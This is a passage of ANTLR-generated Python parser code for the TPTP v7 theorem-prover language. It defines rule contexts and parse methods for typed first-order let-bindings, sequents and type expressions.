def tff_let_term_binding(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_bindingContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_term_defn
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_term_defn" ):
listener.enterTff_let_term_defn(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_term_defn" ):
listener.exitTff_let_term_defn(self)
def tff_let_term_defn(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_term_defnContext(self, self._ctx, self.state)
self.enterRule(localctx, 134, self.RULE_tff_let_term_defn)
try:
self.state = 895
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Forall]:
self.enterOuterAlt(localctx, 1)
self.state = 887
self.match(tptp_v7_0_0_0Parser.Forall)
self.state = 888
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 889
self.tff_variable_list()
self.state = 890
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 891
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 892
self.tff_let_term_defn()
pass
elif token in [tptp_v7_0_0_0Parser.T__9, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 2)
self.state = 894
self.tff_let_term_binding()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_term_bindingContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_plain_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_plain_termContext,0)
def Infix_equality(self):
return self.getToken(tptp_v7_0_0_0Parser.Infix_equality, 0)
def fof_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,0)
def tff_let_term_binding(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_bindingContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_term_binding
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_term_binding" ):
listener.enterTff_let_term_binding(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_term_binding" ):
listener.exitTff_let_term_binding(self)
def tff_let_term_binding(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_term_bindingContext(self, self._ctx, self.state)
self.enterRule(localctx, 136, self.RULE_tff_let_term_binding)
try:
self.state = 905
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 897
self.fof_plain_term()
self.state = 898
self.match(tptp_v7_0_0_0Parser.Infix_equality)
self.state = 899
self.fof_term()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 901
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 902
self.tff_let_term_binding()
self.state = 903
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_formula_defnsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_formula_defn(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_defnContext,0)
def tff_let_formula_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_formula_defns
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_formula_defns" ):
listener.enterTff_let_formula_defns(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_formula_defns" ):
listener.exitTff_let_formula_defns(self)
def tff_let_formula_defns(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_formula_defnsContext(self, self._ctx, self.state)
self.enterRule(localctx, 138, self.RULE_tff_let_formula_defns)
try:
self.state = 912
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__9, tptp_v7_0_0_0Parser.Forall, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 907
self.tff_let_formula_defn()
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 908
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 909
self.tff_let_formula_list()
self.state = 910
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_formula_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_formula_defn(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_let_formula_defnContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_defnContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_formula_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_formula_list" ):
listener.enterTff_let_formula_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_formula_list" ):
listener.exitTff_let_formula_list(self)
def tff_let_formula_list(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_formula_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 140, self.RULE_tff_let_formula_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 914
self.tff_let_formula_defn()
self.state = 919
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 915
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 916
self.tff_let_formula_defn()
self.state = 921
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_formula_defnContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Forall(self):
return self.getToken(tptp_v7_0_0_0Parser.Forall, 0)
def tff_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variable_listContext,0)
def tff_let_formula_defn(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_defnContext,0)
def tff_let_formula_binding(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_bindingContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_formula_defn
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_formula_defn" ):
listener.enterTff_let_formula_defn(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_formula_defn" ):
listener.exitTff_let_formula_defn(self)
def tff_let_formula_defn(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_formula_defnContext(self, self._ctx, self.state)
self.enterRule(localctx, 142, self.RULE_tff_let_formula_defn)
try:
self.state = 930
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Forall]:
self.enterOuterAlt(localctx, 1)
self.state = 922
self.match(tptp_v7_0_0_0Parser.Forall)
self.state = 923
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 924
self.tff_variable_list()
self.state = 925
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 926
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 927
self.tff_let_formula_defn()
pass
elif token in [tptp_v7_0_0_0Parser.T__9, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 2)
self.state = 929
self.tff_let_formula_binding()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_formula_bindingContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_plain_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_plain_atomic_formulaContext,0)
def Iff(self):
return self.getToken(tptp_v7_0_0_0Parser.Iff, 0)
def tff_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,0)
def tff_let_formula_binding(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_bindingContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_formula_binding
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_formula_binding" ):
listener.enterTff_let_formula_binding(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_formula_binding" ):
listener.exitTff_let_formula_binding(self)
def tff_let_formula_binding(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_formula_bindingContext(self, self._ctx, self.state)
self.enterRule(localctx, 144, self.RULE_tff_let_formula_binding)
try:
self.state = 940
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 932
self.fof_plain_atomic_formula()
self.state = 933
self.match(tptp_v7_0_0_0Parser.Iff)
self.state = 934
self.tff_unitary_formula()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 936
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 937
self.tff_let_formula_binding()
self.state = 938
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_sequentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_formula_tuple(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_formula_tupleContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_formula_tupleContext,i)
def Gentzen_arrow(self):
return self.getToken(tptp_v7_0_0_0Parser.Gentzen_arrow, 0)
def tff_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_sequent
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_sequent" ):
listener.enterTff_sequent(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_sequent" ):
listener.exitTff_sequent(self)
def tff_sequent(self):
localctx = tptp_v7_0_0_0Parser.Tff_sequentContext(self, self._ctx, self.state)
self.enterRule(localctx, 146, self.RULE_tff_sequent)
try:
self.state = 950
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__11, tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 942
self.tff_formula_tuple()
self.state = 943
self.match(tptp_v7_0_0_0Parser.Gentzen_arrow)
self.state = 944
self.tff_formula_tuple()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 946
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 947
self.tff_sequent()
self.state = 948
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_formula_tupleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_formula_tuple_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_formula_tuple_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_formula_tuple
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_formula_tuple" ):
listener.enterTff_formula_tuple(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_formula_tuple" ):
listener.exitTff_formula_tuple(self)
def tff_formula_tuple(self):
localctx = tptp_v7_0_0_0Parser.Tff_formula_tupleContext(self, self._ctx, self.state)
self.enterRule(localctx, 148, self.RULE_tff_formula_tuple)
try:
self.state = 957
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 952
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 953
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 954
self.tff_formula_tuple_list()
self.state = 955
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_formula_tuple_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_logic_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_logic_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_logic_formulaContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_formula_tuple_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_formula_tuple_list" ):
listener.enterTff_formula_tuple_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_formula_tuple_list" ):
listener.exitTff_formula_tuple_list(self)
def tff_formula_tuple_list(self):
localctx = tptp_v7_0_0_0Parser.Tff_formula_tuple_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 150, self.RULE_tff_formula_tuple_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 959
self.tff_logic_formula()
self.state = 964
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 960
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 961
self.tff_logic_formula()
self.state = 966
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_typed_atomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def untyped_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Untyped_atomContext,0)
def tff_top_level_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_top_level_typeContext,0)
def tff_typed_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_typed_atomContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_typed_atom
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_typed_atom" ):
listener.enterTff_typed_atom(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_typed_atom" ):
listener.exitTff_typed_atom(self)
def tff_typed_atom(self):
localctx = tptp_v7_0_0_0Parser.Tff_typed_atomContext(self, self._ctx, self.state)
self.enterRule(localctx, 152, self.RULE_tff_typed_atom)
try:
self.state = 975
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 967
self.untyped_atom()
self.state = 968
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 969
self.tff_top_level_type()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 971
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 972
self.tff_typed_atom()
self.state = 973
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_subtypeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def untyped_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Untyped_atomContext,0)
def Subtype_sign(self):
return self.getToken(tptp_v7_0_0_0Parser.Subtype_sign, 0)
def atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AtomContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_subtype
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_subtype" ):
listener.enterTff_subtype(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_subtype" ):
listener.exitTff_subtype(self)
def tff_subtype(self):
localctx = tptp_v7_0_0_0Parser.Tff_subtypeContext(self, self._ctx, self.state)
self.enterRule(localctx, 154, self.RULE_tff_subtype)
try:
self.enterOuterAlt(localctx, 1)
self.state = 977
self.untyped_atom()
self.state = 978
self.match(tptp_v7_0_0_0Parser.Subtype_sign)
self.state = 979
self.atom()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_top_level_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def tff_mapping_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_mapping_typeContext,0)
def tf1_quantified_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tf1_quantified_typeContext,0)
def tff_top_level_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_top_level_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_top_level_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_top_level_type" ):
listener.enterTff_top_level_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_top_level_type" ):
listener.exitTff_top_level_type(self)
def tff_top_level_type(self):
localctx = tptp_v7_0_0_0Parser.Tff_top_level_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 156, self.RULE_tff_top_level_type)
try:
self.state = 988
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,57,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 981
self.tff_atomic_type()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 982
self.tff_mapping_type()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 983
self.tf1_quantified_type()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 984
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 985
self.tff_top_level_type()
self.state = 986
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tf1_quantified_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def TyForall(self):
return self.getToken(tptp_v7_0_0_0Parser.TyForall, 0)
def tff_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variable_listContext,0)
def tff_monotype(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_monotypeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tf1_quantified_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTf1_quantified_type" ):
listener.enterTf1_quantified_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTf1_quantified_type" ):
listener.exitTf1_quantified_type(self)
def tf1_quantified_type(self):
localctx = tptp_v7_0_0_0Parser.Tf1_quantified_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 158, self.RULE_tf1_quantified_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 990
self.match(tptp_v7_0_0_0Parser.TyForall)
self.state = 991
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 992
self.tff_variable_list()
self.state = 993
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 994
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 995
self.tff_monotype()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_monotypeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def tff_mapping_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_mapping_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_monotype
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_monotype" ):
listener.enterTff_monotype(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_monotype" ):
listener.exitTff_monotype(self)
def tff_monotype(self):
localctx = tptp_v7_0_0_0Parser.Tff_monotypeContext(self, self._ctx, self.state)
self.enterRule(localctx, 160, self.RULE_tff_monotype)
try:
self.state = 1002
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 997
self.tff_atomic_type()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 998
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 999
self.tff_mapping_type()
self.state = 1000
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_unitary_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def tff_xprod_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_xprod_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_unitary_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_unitary_type" ):
listener.enterTff_unitary_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_unitary_type" ):
listener.exitTff_unitary_type(self)
def tff_unitary_type(self):
localctx = tptp_v7_0_0_0Parser.Tff_unitary_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 162, self.RULE_tff_unitary_type)
try:
self.state = 1009
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1004
self.tff_atomic_type()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 1005
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1006
self.tff_xprod_type(0)
self.state = 1007
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_atomic_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def type_constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Type_constantContext,0)
def defined_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_typeContext,0)
def type_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Type_functorContext,0)
def tff_type_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_type_argumentsContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_atomic_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_atomic_type" ):
listener.enterTff_atomic_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_atomic_type" ):
listener.exitTff_atomic_type(self)
def tff_atomic_type(self):
localctx = tptp_v7_0_0_0Parser.Tff_atomic_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 164, self.RULE_tff_atomic_type)
try:
self.state = 1019
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,60,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1011
self.type_constant()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1012
self.defined_type()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1013
self.type_functor()
self.state = 1014
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1015
self.tff_type_arguments()
self.state = 1016
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 1018
self.variable()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_type_argumentsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_atomic_type(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_atomic_typeContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_type_arguments
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_type_arguments" ):
listener.enterTff_type_arguments(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_type_arguments" ):
listener.exitTff_type_arguments(self)
def tff_type_arguments(self):
localctx = tptp_v7_0_0_0Parser.Tff_type_argumentsContext(self, self._ctx, self.state)
self.enterRule(localctx, 166, self.RULE_tff_type_arguments)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1021
self.tff_atomic_type()
self.state = 1026
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1022
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1023
self.tff_atomic_type()
self.state = 1028
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_mapping_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_unitary_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_typeContext,0)
def Arrow(self):
return self.getToken(tptp_v7_0_0_0Parser.Arrow, 0)
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_mapping_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_mapping_type" ):
listener.enterTff_mapping_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_mapping_type" ):
listener.exitTff_mapping_type(self)
def tff_mapping_type(self):
localctx = tptp_v7_0_0_0Parser.Tff_mapping_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 168, self.RULE_tff_mapping_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1029
self.tff_unitary_type()
self.state = 1030
self.match(tptp_v7_0_0_0Parser.Arrow)
self.state = 1031
self.tff_atomic_type()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
